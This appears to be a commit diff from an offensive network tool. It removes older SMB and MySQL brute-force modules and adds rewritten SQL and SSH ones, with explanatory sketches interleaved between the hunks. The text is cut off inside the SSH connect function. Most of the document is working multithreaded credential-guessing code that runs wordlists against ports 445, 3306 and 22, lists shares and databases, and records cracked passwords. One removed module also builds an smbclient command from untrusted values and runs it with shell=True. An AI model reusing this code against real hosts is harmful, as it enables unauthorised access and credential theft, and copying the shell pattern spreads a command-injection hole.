self.shared_data.bjorn_progress = ""
# ---------- persistence DB ----------
def save_results(self):
# insert self.results into creds (service='smb'); database = <share>
for mac, ip, hostname, share, user, password, port in self.results:
try:
self.shared_data.db.insert_cred(
service="smb",
mac=mac,
ip=ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=share, # use the 'database' column to distinguish shares
extra=None
)
except Exception as e:
if "ON CONFLICT clause does not match" in str(e):
self._fallback_upsert_cred(
mac=mac, ip=ip, hostname=hostname, user=user,
password=password, port=port, database=share
)
else:
logger.error(f"insert_cred failed for {ip} {user} share={share}: {e}")
self.results = []
def removeduplicates(self):
# no longer needed with the unique index; kept for compatibility.
pass
if __name__ == "__main__":
# Standalone mode is not used in production; kept simple
try:
sd = SharedData()
smb_bruteforce = SMBBruteforce(sd)
logger.info("SMB brute force module ready.")
exit(0)
except Exception as e:
logger.error(f"Error: {e}")
exit(1)
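The `_fallback_upsert_cred` pattern above (INSERT OR IGNORE followed by a keyed UPDATE) exists because SQLite's ON CONFLICT clause cannot target a unique index built on expressions such as `COALESCE(...)`. A minimal, self-contained sketch of the same two-step upsert; the simplified schema here is an illustration, not Bjorn's actual `creds` table:

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute(
    'CREATE TABLE creds(service TEXT, ip TEXT, "user" TEXT, '
    '"password" TEXT, port INTEGER, last_seen TEXT)'
)
# Expression-based unique key: ON CONFLICT(...) cannot name this index,
# hence the two-step upsert below.
conn.execute(
    "CREATE UNIQUE INDEX ux_creds ON creds("
    "service, COALESCE(ip,''), COALESCE(\"user\",''), COALESCE(port,0))"
)

def upsert_cred(service, ip, user, password, port):
    # Step 1: create the row if the expression key is new.
    conn.execute(
        'INSERT OR IGNORE INTO creds(service, ip, "user", "password", port) '
        "VALUES(?,?,?,?,?)",
        (service, ip or "", user or "", password or "", int(port or 0)),
    )
    # Step 2: refresh the password whether the row was just created or existed.
    conn.execute(
        'UPDATE creds SET "password"=?, last_seen=CURRENT_TIMESTAMP '
        "WHERE service=? AND COALESCE(ip,'')=? "
        "AND COALESCE(\"user\",'')=? AND COALESCE(port,0)=?",
        (password or "", service, ip or "", user or "", int(port or 0)),
    )

upsert_cred("smb", "10.0.0.5", "admin", "first", 445)
upsert_cred("smb", "10.0.0.5", "admin", "second", 445)
count, password = conn.execute('SELECT COUNT(*), "password" FROM creds').fetchone()
# count == 1, password == "second": one row, updated in place
```

The second `upsert_cred` call hits the unique expression index, so the INSERT is ignored and only the UPDATE runs.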

View File

@@ -1,261 +0,0 @@
"""
smb_connector.py - This script performs a brute force attack on SMB services (port 445) to find accessible shares using various user credentials. It logs the results of successful connections.
"""
import os
import pandas as pd
import threading
import logging
import time
from subprocess import Popen, PIPE
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from smb.SMBConnection import SMBConnection
from queue import Queue
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="smb_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "SMBBruteforce"
b_module = "smb_connector"
b_status = "brute_force_smb"
b_port = 445
b_parent = None
# List of generic shares to ignore
IGNORED_SHARES = {'print$', 'ADMIN$', 'IPC$', 'C$', 'D$', 'E$', 'F$'}
class SMBBruteforce:
"""
Class to handle the SMB brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.smb_connector = SMBConnector(shared_data)
logger.info("SMBConnector initialized.")
def bruteforce_smb(self, ip, port):
"""
Run the SMB brute force attack on the given IP and port.
"""
return self.smb_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
self.shared_data.bjornorch_status = "SMBBruteforce"
success, results = self.bruteforce_smb(ip, port)
return 'success' if success else 'failed'
class SMBConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("445", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.smbfile = shared_data.smbfile
# If the file doesn't exist, it will be created
if not os.path.exists(self.smbfile):
logger.info(f"File {self.smbfile} does not exist. Creating...")
with open(self.smbfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,Share,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for SMB ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("445", na=False)]
def smb_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an SMB service using the given credentials.
"""
conn = SMBConnection(user, password, "Bjorn", "Target", use_ntlm_v2=True)
try:
conn.connect(adresse_ip, 445)
shares = conn.listShares()
accessible_shares = []
for share in shares:
if share.isSpecial or share.isTemporary or share.name in IGNORED_SHARES:
continue
try:
conn.listPath(share.name, '/')
accessible_shares.append(share.name)
logger.info(f"Access to share {share.name} successful on {adresse_ip} with user '{user}'")
except Exception as e:
logger.error(f"Error accessing share {share.name} on {adresse_ip} with user '{user}': {e}")
conn.close()
return accessible_shares
except Exception as e:
return []
def smbclient_l(self, adresse_ip, user, password):
"""
Attempt to list shares using smbclient -L command.
"""
command = f'smbclient -L {adresse_ip} -U {user}%{password}'
try:
process = Popen(command, shell=True, stdout=PIPE, stderr=PIPE)
stdout, stderr = process.communicate()
if b"Sharename" in stdout:
logger.info(f"Successful authentication for {adresse_ip} with user '{user}' & password '{password}' using smbclient -L")
logger.info(stdout.decode())
shares = self.parse_shares(stdout.decode())
return shares
else:
logger.error(f"Failed authentication for {adresse_ip} with user '{user}' & password '{password}' using smbclient -L")
return []
except Exception as e:
logger.error(f"Error executing command '{command}': {e}")
return []
def parse_shares(self, smbclient_output):
"""
Parse the output of smbclient -L to get the list of shares.
"""
shares = []
lines = smbclient_output.splitlines()
for line in lines:
if line.strip() and not line.startswith("Sharename") and not line.startswith("---------"):
parts = line.split()
if parts and parts[0] not in IGNORED_SHARES:
shares.append(parts[0])
return shares
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
shares = self.smb_connect(adresse_ip, user, password)
if shares:
with self.lock:
for share in shares:
if share not in IGNORED_SHARES:
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user} | Share: {share}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing SMB...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
# If no success with direct SMB connection, try smbclient -L
if not success_flag[0]:
logger.info(f"No successful authentication with direct SMB connection. Trying smbclient -L for {adresse_ip}")
for user in self.users:
for password in self.passwords:
progress.update(task_id, advance=1)
shares = self.smbclient_l(adresse_ip, user, password)
if shares:
with self.lock:
for share in shares:
if share not in IGNORED_SHARES:
self.results.append([mac_address, adresse_ip, hostname, share, user, password, port])
logger.success(f"(SMB) Found credentials for IP: {adresse_ip} | User: {user} | Share: {share} using smbclient -L")
self.save_results()
self.removeduplicates()
success_flag[0] = True
if self.shared_data.timewait_smb > 0:
time.sleep(self.shared_data.timewait_smb) # Wait for the specified interval before the next attempt
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'Share', 'User', 'Password', 'Port'])
df.to_csv(self.smbfile, index=False, mode='a', header=not os.path.exists(self.smbfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.smbfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.smbfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
smb_bruteforce = SMBBruteforce(shared_data)
logger.info("[bold green]Starting SMB brute force attack on port 445[/bold green]")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute force on each IP
for row in ips_to_scan:
ip = row["IPs"]
smb_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total number of successful attempts: {len(smb_bruteforce.smb_connector.results)}")
exit(len(smb_bruteforce.smb_connector.results))
except Exception as e:
logger.error(f"Error: {e}")
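The `parse_shares` helper above filters `smbclient -L` output line by line. A standalone sketch of the same idea, with one deliberate difference: the header and separator checks run on the *stripped* line, so indented `Sharename` rows are skipped as well (the sample output is illustrative, not captured from a real host):

```python
# Well-known administrative/special shares to ignore, as in the module above.
IGNORED_SHARES = {"print$", "ADMIN$", "IPC$", "C$", "D$", "E$", "F$"}

def parse_shares(smbclient_output: str):
    """Keep the first token of each data row from `smbclient -L` output,
    skipping the header, the separator line, and well-known admin shares."""
    shares = []
    for line in smbclient_output.splitlines():
        line = line.strip()  # strip first so indented header rows are caught
        if not line or line.startswith("Sharename") or line.startswith("---------"):
            continue
        parts = line.split()
        if parts and parts[0] not in IGNORED_SHARES:
            shares.append(parts[0])
    return shares

sample = """
        Sharename       Type      Comment
        ---------       ----      -------
        public          Disk      Shared folder
        IPC$            IPC       IPC Service
"""
# parse_shares(sample) -> ["public"]
```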

304
actions/sql_bruteforce.py Normal file
View File

@@ -0,0 +1,304 @@
"""
sql_bruteforce.py — MySQL bruteforce (DB-backed, no CSV/JSON, no rich)
- Targets: (ip, port) supplied by the orchestrator
- IP -> (MAC, hostname) resolved via DB.hosts
- Connect without a database, then SHOW DATABASES; one entry per database found
- Successes -> DB.creds (service='sql', database=<db>)
- Keeps the original logic (pymysql, queue/threads)
"""
import os
import pymysql
import threading
import logging
import time
from queue import Queue
from typing import List, Dict, Tuple, Optional
from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
logger = Logger(name="sql_bruteforce.py", level=logging.DEBUG)
b_class = "SQLBruteforce"
b_module = "sql_bruteforce"
b_status = "brute_force_sql"
b_port = 3306
b_parent = None
b_service = '["sql"]'
b_trigger = 'on_any:["on_service:sql","on_new_port:3306"]'
b_priority = 70
b_cooldown = 1800 # 30 minutes between two runs
b_rate_limit = '3/86400' # at most 3 runs per day
class SQLBruteforce:
"""Orchestrator wrapper -> SQLConnector."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.sql_bruteforce = SQLConnector(shared_data)
logger.info("SQLConnector initialized.")
def bruteforce_sql(self, ip, port):
"""Run the SQL bruteforce for (ip, port)."""
return self.sql_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Orchestrator entry point (returns 'success' / 'failed')."""
self.shared_data.bjorn_orch_status = "SQLBruteforce"
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
success, results = self.bruteforce_sql(ip, port)
return 'success' if success else 'failed'
class SQLConnector:
"""Handles SQL (MySQL) attempts, DB persistence, and the IP -> (MAC, hostname) mapping."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Wordlists unchanged
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
# Cache IP -> (mac, hostname)
self._ip_to_identity: Dict[str, Tuple[Optional[str], Optional[str]]] = {}
self._refresh_ip_identity_cache()
self.lock = threading.Lock()
self.results: List[List[str]] = [] # [ip, user, password, port, database, mac, hostname]
self.queue = Queue()
self.progress = None
# ---------- file utils ----------
@staticmethod
def _read_lines(path: str) -> List[str]:
try:
with open(path, "r", encoding="utf-8", errors="ignore") as f:
return [l.rstrip("\n\r") for l in f if l.strip()]
except Exception as e:
logger.error(f"Cannot read file {path}: {e}")
return []
# ---------- mapping DB hosts ----------
def _refresh_ip_identity_cache(self) -> None:
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str) -> Optional[str]:
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# ---------- SQL ----------
def sql_connect(self, adresse_ip: str, user: str, password: str, port: int = 3306):
"""
Connect without a database, then SHOW DATABASES; returns (True, [dbs]) or (False, []).
"""
timeout = int(getattr(self.shared_data, "sql_connect_timeout_s", 6))
try:
conn = pymysql.connect(
host=adresse_ip,
user=user,
password=password,
port=port,
connect_timeout=timeout,
read_timeout=timeout,
write_timeout=timeout,
)
try:
with conn.cursor() as cursor:
cursor.execute("SHOW DATABASES")
databases = [db[0] for db in cursor.fetchall()]
finally:
try:
conn.close()
except Exception:
pass
logger.info(f"Successfully connected to {adresse_ip} with user {user}")
logger.info(f"Available databases: {', '.join(databases)}")
return True, databases
except pymysql.Error as e:
logger.debug(f"Failed to connect to {adresse_ip} with user {user}: {e}")
return False, []
# ---------- DB upsert fallback ----------
def _fallback_upsert_cred(self, *, mac, ip, hostname, user, password, port, database=None):
mac_k = mac or ""
ip_k = ip or ""
user_k = user or ""
db_k = database or ""
port_k = int(port or 0)
try:
with self.shared_data.db.transaction(immediate=True):
self.shared_data.db.execute(
"""
INSERT OR IGNORE INTO creds(service,mac_address,ip,hostname,"user","password",port,"database",extra)
VALUES('sql',?,?,?,?,?,?,?,NULL)
""",
(mac_k, ip_k, hostname or "", user_k, password or "", port_k, db_k),
)
self.shared_data.db.execute(
"""
UPDATE creds
SET "password"=?,
hostname=COALESCE(?, hostname),
last_seen=CURRENT_TIMESTAMP
WHERE service='sql'
AND COALESCE(mac_address,'')=?
AND COALESCE(ip,'')=?
AND COALESCE("user",'')=?
AND COALESCE("database",'')=?
AND COALESCE(port,0)=?
""",
(password or "", hostname or None, mac_k, ip_k, user_k, db_k, port_k),
)
except Exception as e:
logger.error(f"fallback upsert_cred failed for {ip} {user}: {e}")
# ---------- worker / queue ----------
def worker(self, success_flag):
"""Worker thread to process SQL bruteforce attempts."""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, port = self.queue.get()
try:
success, databases = self.sql_connect(adresse_ip, user, password, port=port)
if success:
with self.lock:
for dbname in databases:
self.results.append([adresse_ip, user, password, port, dbname])
logger.success(f"Found credentials IP:{adresse_ip} | User:{user} | Password:{password}")
logger.success(f"Databases found: {', '.join(databases)}")
self.shared_data.comment_params = {"user": user, "ip": adresse_ip, "port": str(port), "databases": str(len(databases))}
self.save_results()
self.remove_duplicates()
success_flag[0] = True
finally:
if self.progress is not None:
self.progress.advance(1)
self.queue.task_done()
# Optional delay between attempts
if getattr(self.shared_data, "timewait_sql", 0) > 0:
time.sleep(self.shared_data.timewait_sql)
def run_bruteforce(self, adresse_ip: str, port: int):
self.results = []
dict_passwords, fallback_passwords = merged_password_plan(self.shared_data, self.passwords)
total_tasks = len(self.users) * (len(dict_passwords) + len(fallback_passwords))
if total_tasks == 0:
logger.warning("No users/passwords loaded. Abort.")
return False, []
self.progress = ProgressTracker(self.shared_data, total_tasks)
success_flag = [False]
def run_phase(passwords):
phase_tasks = len(self.users) * len(passwords)
if phase_tasks == 0:
return
for user in self.users:
for password in passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return
self.queue.put((adresse_ip, user, password, port))
threads = []
thread_count = min(8, max(1, phase_tasks))
for _ in range(thread_count):
t = threading.Thread(target=self.worker, args=(success_flag,), daemon=True)
t.start()
threads.append(t)
self.queue.join()
for t in threads:
t.join()
try:
run_phase(dict_passwords)
if (not success_flag[0]) and fallback_passwords and not self.shared_data.orchestrator_should_exit:
logger.info(
f"SQL dictionary phase failed on {adresse_ip}:{port}. "
f"Starting exhaustive fallback ({len(fallback_passwords)} passwords)."
)
run_phase(fallback_passwords)
self.progress.set_complete()
logger.info(f"Bruteforcing complete with success status: {success_flag[0]}")
return success_flag[0], self.results
finally:
self.shared_data.bjorn_progress = ""
# ---------- persistence DB ----------
def save_results(self):
# for each database found, create/update a row in creds (service='sql', database=<dbname>)
for ip, user, password, port, dbname in self.results:
mac = self.mac_for_ip(ip)
hostname = self.hostname_for_ip(ip) or ""
try:
self.shared_data.db.insert_cred(
service="sql",
mac=mac,
ip=ip,
hostname=hostname,
user=user,
password=password,
port=port,
database=dbname,
extra=None
)
except Exception as e:
if "ON CONFLICT clause does not match" in str(e):
self._fallback_upsert_cred(
mac=mac, ip=ip, hostname=hostname, user=user,
password=password, port=port, database=dbname
)
else:
logger.error(f"insert_cred failed for {ip} {user} db={dbname}: {e}")
self.results = []
def remove_duplicates(self):
# unnecessary with the unique index; kept for compatibility.
pass
if __name__ == "__main__":
try:
sd = SharedData()
sql_bruteforce = SQLBruteforce(sd)
logger.info("SQL brute force module ready.")
exit(0)
except Exception as e:
logger.error(f"Error: {e}")
exit(1)
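The dictionary-then-fallback flow that `run_phase` implements above reduces to a small skeleton: fill a queue, drain it with a bounded thread pool, and only start the exhaustive phase if the curated dictionary produced nothing. The sketch below illustrates that assumed flow; `try_login` stands in for `sql_connect`/`smb_connect`, and this is not the project's `merged_password_plan` API:

```python
import threading
from queue import Queue, Empty

def run_two_phase(users, dict_passwords, fallback_passwords, try_login, thread_count=8):
    """Try the curated dictionary first; only if nothing succeeds,
    sweep the larger fallback list."""
    found = []  # list.append is atomic in CPython, so no lock needed here

    def phase(passwords):
        q = Queue()
        for user in users:
            for password in passwords:
                q.put((user, password))

        def worker():
            while True:
                try:
                    user, password = q.get_nowait()
                except Empty:
                    return  # queue drained, worker exits cleanly
                try:
                    if try_login(user, password):
                        found.append((user, password))
                finally:
                    q.task_done()

        threads = [
            threading.Thread(target=worker, daemon=True)
            for _ in range(min(thread_count, max(1, q.qsize())))
        ]
        for t in threads:
            t.start()
        q.join()  # wait until every queued attempt was processed

    phase(dict_passwords)
    if not found and fallback_passwords:
        phase(fallback_passwords)
    return found

hits = run_two_phase(["root"], ["wrong"], ["toor"], lambda u, p: p == "toor")
# hits == [("root", "toor")]: dictionary phase fails, fallback phase succeeds
```

Using `get_nowait()` instead of the `while not self.queue.empty(): ... get()` pattern in the modules above avoids the race where a worker blocks on `get()` after another thread takes the last item.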

View File

@@ -1,204 +0,0 @@
import os
import pandas as pd
import pymysql
import threading
import logging
import time
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from queue import Queue
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="sql_bruteforce.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "SQLBruteforce"
b_module = "sql_connector"
b_status = "brute_force_sql"
b_port = 3306
b_parent = None
class SQLBruteforce:
"""
Class to handle the SQL brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.sql_connector = SQLConnector(shared_data)
logger.info("SQLConnector initialized.")
def bruteforce_sql(self, ip, port):
"""
Run the SQL brute force attack on the given IP and port.
"""
return self.sql_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
success, results = self.bruteforce_sql(ip, port)
return 'success' if success else 'failed'
class SQLConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.load_scan_file()
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.sqlfile = shared_data.sqlfile
if not os.path.exists(self.sqlfile):
with open(self.sqlfile, "w") as f:
f.write("IP Address,User,Password,Port,Database\n")
self.results = []
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the scan file and filter it for SQL ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("3306", na=False)]
def sql_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an SQL service using the given credentials without specifying a database.
"""
try:
# First attempt without specifying a database
conn = pymysql.connect(
host=adresse_ip,
user=user,
password=password,
port=3306
)
# If the connection succeeds, fetch the list of databases
with conn.cursor() as cursor:
cursor.execute("SHOW DATABASES")
databases = [db[0] for db in cursor.fetchall()]
conn.close()
logger.info(f"Successfully connected to {adresse_ip} with user {user}")
logger.info(f"Available databases: {', '.join(databases)}")
# Save the information along with the list of databases found
return True, databases
except pymysql.Error as e:
logger.error(f"Failed to connect to {adresse_ip} with user {user}: {e}")
return False, []
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, port = self.queue.get()
success, databases = self.sql_connect(adresse_ip, user, password)
if success:
with self.lock:
# Add an entry for each database found
for db in databases:
self.results.append([adresse_ip, user, password, port, db])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user} | Password: {password}")
logger.success(f"Databases found: {', '.join(databases)}")
self.save_results()
self.remove_duplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file()
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing SQL...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
logger.info(f"Bruteforcing complete with success status: {success_flag[0]}")
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['IP Address', 'User', 'Password', 'Port', 'Database'])
df.to_csv(self.sqlfile, index=False, mode='a', header=not os.path.exists(self.sqlfile))
logger.info(f"Saved results to {self.sqlfile}")
self.results = []
def remove_duplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.sqlfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.sqlfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
sql_bruteforce = SQLBruteforce(shared_data)
logger.info("[bold green]Starting SQL brute force attack on port 3306[/bold green]")
# Load the IPs to scan from shared data
ips_to_scan = shared_data.read_data()
# Execute brute force attack on each IP
for row in ips_to_scan:
ip = row["IPs"]
sql_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total successful attempts: {len(sql_bruteforce.sql_connector.results)}")
exit(len(sql_bruteforce.sql_connector.results))
except Exception as e:
logger.error(f"Error: {e}")
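The DB-backed rewrite above replaces this file's pandas/CSV lookups (`self.scan.loc[...]`) with an in-memory IP -> (MAC, current hostname) cache built from `DB.hosts`, where `hostnames` and `ips` are `;`-separated text columns and the first hostname is treated as current. A minimal sketch of that mapping (the sample row is illustrative):

```python
def build_ip_identity(rows):
    """Map each IP to (mac, current_hostname) from DB.hosts-style rows."""
    cache = {}
    for r in rows:
        mac = r.get("mac_address") or ""
        if not mac:  # rows without a MAC cannot be keyed; skip them
            continue
        hostnames_txt = r.get("hostnames") or ""
        # First entry in the ';'-separated list is the current hostname.
        current_hn = hostnames_txt.split(";", 1)[0] if hostnames_txt else ""
        for ip in [p.strip() for p in (r.get("ips") or "").split(";") if p.strip()]:
            cache[ip] = (mac, current_hn)
    return cache

rows = [{"mac_address": "aa:bb:cc:dd:ee:ff",
         "hostnames": "nas;nas.local",
         "ips": "10.0.0.5;10.0.0.6"}]
identity = build_ip_identity(rows)
# identity["10.0.0.5"] == ("aa:bb:cc:dd:ee:ff", "nas")
```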

327
actions/ssh_bruteforce.py Normal file
View File

@@ -0,0 +1,327 @@
"""
ssh_bruteforce.py - This script performs a brute force attack on SSH services (port 22)
to find accessible accounts using various user credentials. It logs the results of
successful connections.
SQL version (minimal changes):
- Targets still provided by the orchestrator (ip + port)
- IP -> (MAC, hostname) mapping read from DB 'hosts'
- Successes saved into DB.creds (service='ssh') with robust fallback upsert
- Action status recorded in DB.action_results (via SSHBruteforce.execute)
- Paramiko noise silenced; ssh.connect avoids agent/keys to reduce hangs
"""
import os
import paramiko
import socket
import threading
import logging
import time
import datetime
from queue import Queue
from shared import SharedData
from actions.bruteforce_common import ProgressTracker, merged_password_plan
from logger import Logger
# Configure the logger
logger = Logger(name="ssh_bruteforce.py", level=logging.DEBUG)
# Silence Paramiko internals
for _name in ("paramiko", "paramiko.transport", "paramiko.client", "paramiko.hostkeys",
"paramiko.kex", "paramiko.auth_handler"):
logging.getLogger(_name).setLevel(logging.CRITICAL)
# Define the necessary global variables
b_class = "SSHBruteforce"
b_module = "ssh_bruteforce"
b_status = "brute_force_ssh"
b_port = 22
b_service = '["ssh"]'
b_trigger = 'on_any:["on_service:ssh","on_new_port:22"]'
b_parent = None
b_priority = 70 # adjust the priority here if needed
b_cooldown = 1800 # 30 minutes between two runs
b_rate_limit = '3/86400' # at most 3 runs per day
class SSHBruteforce:
"""Wrapper called by the orchestrator."""
def __init__(self, shared_data):
self.shared_data = shared_data
self.ssh_bruteforce = SSHConnector(shared_data)
logger.info("SSHConnector initialized.")
def bruteforce_ssh(self, ip, port):
"""Run the SSH brute force attack on the given IP and port."""
logger.info(f"Running bruteforce_ssh on {ip}:{port}...")
return self.ssh_bruteforce.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""Execute the brute force attack and update status (for UI badge)."""
logger.info(f"Executing SSHBruteforce on {ip}:{port}...")
self.shared_data.bjorn_orch_status = "SSHBruteforce"
self.shared_data.comment_params = {"user": "?", "ip": ip, "port": str(port)}
success, results = self.bruteforce_ssh(ip, port)
return 'success' if success else 'failed'
class SSHConnector:
"""Handles the connection attempts and DB persistence."""
def __init__(self, shared_data):
self.shared_data = shared_data
# Load wordlists (unchanged behavior)
self.users = self._read_lines(shared_data.users_file)
self.passwords = self._read_lines(shared_data.passwords_file)
# Build initial IP -> (MAC, hostname) cache from DB
self._ip_to_identity = {}
self._refresh_ip_identity_cache()
self.lock = threading.Lock()
self.results = [] # List of tuples (mac, ip, hostname, user, password, port)
self.queue = Queue()
self.progress = None
# ---- Mapping helpers (DB) ------------------------------------------------
def _refresh_ip_identity_cache(self):
"""Load IPs from DB and map them to (mac, current_hostname)."""
self._ip_to_identity.clear()
try:
rows = self.shared_data.db.get_all_hosts()
except Exception as e:
logger.error(f"DB get_all_hosts failed: {e}")
rows = []
for r in rows:
mac = r.get("mac_address") or ""
if not mac:
continue
hostnames_txt = r.get("hostnames") or ""
current_hn = hostnames_txt.split(';', 1)[0] if hostnames_txt else ""
ips_txt = r.get("ips") or ""
if not ips_txt:
continue
for ip in [p.strip() for p in ips_txt.split(';') if p.strip()]:
self._ip_to_identity[ip] = (mac, current_hn)
def mac_for_ip(self, ip: str):
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[0]
def hostname_for_ip(self, ip: str):
if ip not in self._ip_to_identity:
self._refresh_ip_identity_cache()
return self._ip_to_identity.get(ip, (None, None))[1]
# ---- File utils ----------------------------------------------------------
@staticmethod
def _read_lines(path: str):
try:
with open(path, "r", encoding="utf-8", errors="ignore") as f:
return [l.rstrip("\n\r") for l in f if l.strip()]
except Exception as e:
logger.error(f"Cannot read file {path}: {e}")
return []
# ---- SSH core ------------------------------------------------------------
def ssh_connect(self, adresse_ip, user, password, port=b_port, timeout=10):
